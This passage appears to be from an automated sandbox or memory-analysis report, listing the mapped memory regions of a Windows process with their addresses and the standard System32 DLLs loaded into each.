mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1240 start_va = 0x7ffbf69b0000 end_va = 0x7ffbf69b7fff entry_point = 0x7ffbf69b0000 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 1241 start_va = 0x7ffbf6a70000 end_va = 0x7ffbf6a8cfff entry_point = 0x7ffbf6a70000 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 1242 start_va = 0x7ffbf6f50000 end_va = 0x7ffbf6f61fff entry_point = 0x7ffbf6f50000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1243 start_va = 0x7ffbf6f70000 end_va = 0x7ffbf6fb5fff entry_point = 0x7ffbf6f70000 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 1244 start_va = 0x7ffbf74e0000 end_va = 0x7ffbf751ffff entry_point = 0x7ffbf74e0000 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 1245 start_va = 0x7ffbf7520000 end_va = 0x7ffbf7567fff entry_point = 0x7ffbf7520000 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 1246 start_va = 0x7ffbf7570000 end_va = 0x7ffbf7580fff entry_point = 0x7ffbf7570000 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1247 start_va = 0x7ffbf7590000 end_va = 0x7ffbf759cfff entry_point = 0x7ffbf7590000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1248 start_va = 0x7ffbf7b30000 end_va = 0x7ffbf7b3dfff entry_point = 0x7ffbf7b30000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1249 start_va = 0x7ffbf9250000 end_va = 0x7ffbf9264fff entry_point = 0x7ffbf9250000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1250 start_va = 0x7ffbf9270000 end_va = 0x7ffbf92b0fff entry_point = 0x7ffbf9270000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1251 start_va = 0x7ffbf9810000 end_va = 0x7ffbf982cfff entry_point = 0x7ffbf9810000 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 1252 start_va = 0x7ffbf9830000 end_va = 0x7ffbf9893fff entry_point = 0x7ffbf9830000 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 1253 start_va = 0x7ffbf99c0000 end_va = 0x7ffbf9a1efff entry_point = 0x7ffbf99c0000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1254 start_va = 0x7ffbf9aa0000 end_va = 0x7ffbf9ab7fff entry_point = 0x7ffbf9aa0000 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 1255 start_va = 0x7ffbf9ac0000 end_va = 0x7ffbf9ae2fff entry_point = 0x7ffbf9ac0000 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 1256 start_va = 0x7ffbf9b00000 end_va = 0x7ffbf9b14fff entry_point = 0x7ffbf9b00000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1257 start_va = 0x7ffbf9b20000 end_va = 0x7ffbf9b64fff entry_point = 0x7ffbf9b20000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1258 start_va = 0x7ffbf9b70000 end_va = 0x7ffbf9b83fff entry_point = 0x7ffbf9b70000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1259 start_va = 0x7ffbf9b90000 end_va = 0x7ffbf9c80fff entry_point = 0x7ffbf9b90000 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1260 start_va = 0x7ffbf9d80000 end_va = 0x7ffbf9d9bfff entry_point = 0x7ffbf9d80000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1261 start_va = 0x7ffbf9da0000 end_va = 0x7ffbf9db7fff entry_point = 0x7ffbf9da0000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1262 start_va = 0x7ffbf9dc0000 end_va = 0x7ffbf9f42fff entry_point = 0x7ffbf9dc0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1263 start_va = 0x7ffbf9f50000 end_va = 0x7ffbf9f59fff entry_point = 0x7ffbf9f50000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1264 start_va = 0x7ffbf9f80000 end_va = 0x7ffbfa01efff entry_point = 0x7ffbf9f80000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1265 start_va = 0x7ffbfa020000 end_va = 0x7ffbfa07afff entry_point = 0x7ffbfa020000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1266 start_va = 0x7ffbfa080000 end_va = 0x7ffbfa0adfff entry_point = 0x7ffbfa080000 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 1267 start_va = 0x7ffbfa0b0000 end_va = 0x7ffbfa10cfff entry_point = 0x7ffbfa0b0000 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 1268 start_va = 0x7ffbfa110000 end_va = 0x7ffbfa12ffff entry_point = 0x7ffbfa110000 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 1269 start_va = 0x7ffbfa130000 end_va = 0x7ffbfa137fff entry_point = 0x7ffbfa130000 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 1270 start_va = 0x7ffbfa140000 end_va = 0x7ffbfa150fff entry_point = 0x7ffbfa140000 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1271 start_va = 0x7ffbfa160000 end_va = 0x7ffbfa1defff entry_point = 0x7ffbfa160000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1272 start_va = 0x7ffbfa1e0000 end_va = 0x7ffbfa21bfff entry_point = 0x7ffbfa1e0000 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1273 start_va = 0x7ffbfa220000 end_va = 0x7ffbfa25efff entry_point = 0x7ffbfa220000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1274 start_va = 0x7ffbfa410000 end_va = 0x7ffbfa45bfff entry_point = 0x7ffbfa410000 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1275 start_va = 0x7ffbfaa10000 end_va = 0x7ffbfaa26fff entry_point = 0x7ffbfaa10000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1276 start_va = 0x7ffbfb2b0000 end_va = 0x7ffbfb2bbfff entry_point = 0x7ffbfb2b0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1277 start_va = 0x7ffbfba10000 end_va = 0x7ffbfba36fff entry_point = 0x7ffbfba10000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1278 start_va = 0x7ffbfba50000 end_va = 0x7ffbfbae1fff entry_point = 0x7ffbfba50000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1279 start_va = 0x7ffbfbaf0000 end_va = 0x7ffbfbb28fff entry_point = 0x7ffbfbaf0000 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1280 start_va = 0x7ffbfbb30000 end_va = 0x7ffbfbb38fff entry_point = 0x7ffbfbb30000 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 1281 start_va = 0x7ffbfbb40000 end_va = 0x7ffbfbc15fff entry_point = 0x7ffbfbb40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1282 start_va = 0x7ffbfbce0000 end_va = 0x7ffbfbd11fff entry_point = 0x7ffbfbce0000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 1283 start_va = 0x7ffbfbd20000 end_va = 0x7ffbfbd54fff entry_point = 0x7ffbfbd20000 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 1284 start_va = 0x7ffbfbe40000 end_va = 0x7ffbfbe75fff entry_point = 0x7ffbfbe40000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1285 start_va = 0x7ffbfc980000 end_va = 0x7ffbfc988fff entry_point = 0x7ffbfc980000 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 1286 start_va = 0x7ffbfc990000 end_va = 0x7ffbfc9bcfff entry_point = 0x7ffbfc990000 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 1287 start_va = 0x7ffbfc9c0000 end_va = 0x7ffbfc9cffff entry_point = 0x7ffbfc9c0000 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 1288 start_va = 0x7ffbfc9d0000 end_va = 0x7ffbfca20fff entry_point = 0x7ffbfc9d0000 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 1289 start_va = 0x7ffbfca30000 end_va = 0x7ffbfca3bfff entry_point = 0x7ffbfca30000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 1290 start_va = 0x7ffbfca40000 end_va = 0x7ffbfcafdfff entry_point = 0x7ffbfca40000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1291 start_va = 0x7ffbfcbc0000 end_va = 0x7ffbfccf0fff entry_point = 0x7ffbfcbc0000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1292 start_va = 0x7ffbfcd00000 end_va = 0x7ffbfcd3dfff entry_point = 0x7ffbfcd00000 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 1293 start_va = 0x7ffbfcd40000 end_va = 0x7ffbfcdd5fff entry_point = 0x7ffbfcd40000 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1294 start_va = 0x7ffbfcde0000 end_va = 0x7ffbfcdf7fff entry_point = 0x7ffbfcde0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1295 start_va = 0x7ffbfce00000 end_va = 0x7ffbfceb3fff entry_point = 0x7ffbfce00000 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 1296 start_va = 0x7ffbfced0000 end_va = 0x7ffbfcf37fff entry_point = 0x7ffbfced0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1297 start_va = 0x7ffbfcfa0000 end_va = 0x7ffbfcfb9fff entry_point = 0x7ffbfcfa0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1298 start_va = 0x7ffbfcfc0000 end_va = 0x7ffbfcfd5fff entry_point = 0x7ffbfcfc0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1299 start_va = 0x7ffbfd180000 end_va = 0x7ffbfd18ffff entry_point = 0x7ffbfd180000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 1300 start_va = 0x7ffbfd2d0000 end_va = 0x7ffbfd2dffff entry_point = 0x7ffbfd2d0000 region_type = mapped_file name = "timebrokerclient.dll" filename = "\\Windows\\System32\\TimeBrokerClient.dll" (normalized: "c:\\windows\\system32\\timebrokerclient.dll") Region: id = 1301 start_va = 0x7ffbfd2e0000 end_va = 0x7ffbfd30dfff entry_point = 0x7ffbfd2e0000 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 1302 start_va = 0x7ffbfd310000 end_va = 0x7ffbfd33cfff entry_point = 0x7ffbfd310000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1303 start_va = 0x7ffbfd340000 end_va = 0x7ffbfd355fff entry_point = 0x7ffbfd340000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1304 start_va = 0x7ffbfd360000 end_va = 0x7ffbfd3cdfff entry_point = 0x7ffbfd360000 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1305 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1306 start_va = 0x7ffbfd810000 end_va = 0x7ffbfd820fff entry_point = 0x7ffbfd810000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1307 start_va = 0x7ffbfd830000 end_va = 0x7ffbfd83cfff entry_point = 0x7ffbfd830000 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 1308 start_va = 0x7ffbfd840000 end_va = 0x7ffbfd87ffff entry_point = 0x7ffbfd840000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1309 start_va = 0x7ffbfd880000 end_va = 0x7ffbfd97bfff entry_point = 0x7ffbfd880000 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1310 start_va = 0x7ffbfd980000 end_va = 0x7ffbfd9c1fff entry_point = 0x7ffbfd980000 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 1311 start_va = 0x7ffbfd9d0000 end_va = 0x7ffbfd9e6fff entry_point = 0x7ffbfd9d0000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1312 start_va = 0x7ffbfd9f0000 end_va = 0x7ffbfdaaffff entry_point = 0x7ffbfd9f0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1313 start_va = 0x7ffbfdab0000 end_va = 0x7ffbfdacdfff entry_point = 0x7ffbfdab0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1314 start_va = 0x7ffbfdad0000 end_va = 0x7ffbfdaf6fff entry_point = 0x7ffbfdad0000 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 1315 start_va = 0x7ffbfdb00000 end_va = 0x7ffbfdb79fff entry_point = 0x7ffbfdb00000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1316 start_va = 0x7ffbfdb80000 end_va = 0x7ffbfdbd4fff entry_point = 0x7ffbfdb80000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1317 start_va = 0x7ffbfdbf0000 end_va = 0x7ffbfdc02fff entry_point = 0x7ffbfdbf0000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1318 start_va = 0x7ffbfdc10000 end_va = 0x7ffbfdc19fff entry_point = 0x7ffbfdc10000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1319 start_va = 0x7ffbfdc20000 end_va = 0x7ffbfdc37fff entry_point = 0x7ffbfdc20000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1320 start_va = 0x7ffbfdc40000 end_va = 0x7ffbfdd8cfff entry_point = 0x7ffbfdc40000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1321 start_va = 0x7ffbfdeb0000 end_va = 0x7ffbfdf14fff entry_point = 0x7ffbfdeb0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1322 start_va = 0x7ffbfe0d0000 end_va = 0x7ffbfe0dafff entry_point = 0x7ffbfe0d0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1323 start_va = 0x7ffbfe0f0000 end_va = 0x7ffbfe127fff entry_point = 0x7ffbfe0f0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1324 start_va = 0x7ffbfe5c0000 end_va = 0x7ffbfe5d2fff entry_point = 0x7ffbfe5c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1325 start_va = 0x7ffbff0d0000 end_va = 0x7ffbff147fff entry_point = 0x7ffbff0d0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1326 start_va = 0x7ffbff210000 end_va = 0x7ffbff236fff entry_point = 0x7ffbff210000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1327 start_va = 0x7ffbff3f0000 end_va = 0x7ffbff3fbfff entry_point = 0x7ffbff3f0000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1328 start_va = 0x7ffbff5d0000 end_va = 0x7ffbff601fff entry_point = 0x7ffbff5d0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1329 start_va = 0x7ffbff610000 end_va = 0x7ffbff691fff entry_point = 0x7ffbff610000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1330 start_va = 0x7ffbff7c0000 end_va = 0x7ffbff7e2fff entry_point = 0x7ffbff7c0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1331 start_va = 0x7ffbff8f0000 end_va = 0x7ffbff8fbfff entry_point = 0x7ffbff8f0000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1332 start_va = 0x7ffbff9b0000 end_va = 0x7ffbff9f7fff entry_point = 0x7ffbff9b0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1333 start_va = 0x7ffbffad0000 end_va = 0x7ffbffaebfff entry_point = 0x7ffbffad0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1334 start_va = 0x7ffbffaf0000 end_va = 0x7ffbffafbfff entry_point = 0x7ffbffaf0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1335 start_va = 0x7ffbffb00000 end_va = 0x7ffbffb25fff entry_point = 0x7ffbffb00000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1336 start_va = 0x7ffbffbe0000 end_va = 0x7ffbffc11fff entry_point = 0x7ffbffbe0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1337 start_va = 0x7ffbffcc0000 end_va = 0x7ffbffcc9fff entry_point = 0x7ffbffcc0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1338 start_va = 0x7ffbffd20000 end_va = 0x7ffbffd77fff entry_point = 0x7ffbffd20000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1339 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1340 start_va = 0x7ffbffeb0000 end_va = 0x7ffbffecefff entry_point = 0x7ffbffeb0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1341 start_va = 0x7ffbffed0000 end_va = 0x7ffbfff0dfff entry_point = 0x7ffbffed0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1342 start_va = 0x7ffbfff10000 end_va = 0x7ffbfffb7fff entry_point = 0x7ffbfff10000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1343 start_va = 0x7ffc00110000 end_va = 0x7ffc0016cfff entry_point = 0x7ffc00110000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1344 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1345 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1346 start_va = 0x7ffc00320000 end_va = 0x7ffc00340fff entry_point = 0x7ffc00320000 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 1347 start_va = 0x7ffc00370000 end_va = 0x7ffc003a5fff entry_point = 0x7ffc00370000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1348 start_va = 0x7ffc003b0000 end_va = 0x7ffc003d5fff entry_point = 0x7ffc003b0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1349 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1350 start_va = 0x7ffc00690000 end_va = 0x7ffc006a9fff entry_point = 0x7ffc00690000 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 1351 start_va = 0x7ffc006b0000 end_va = 0x7ffc006b7fff entry_point = 0x7ffc006b0000 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 1352 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1353 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 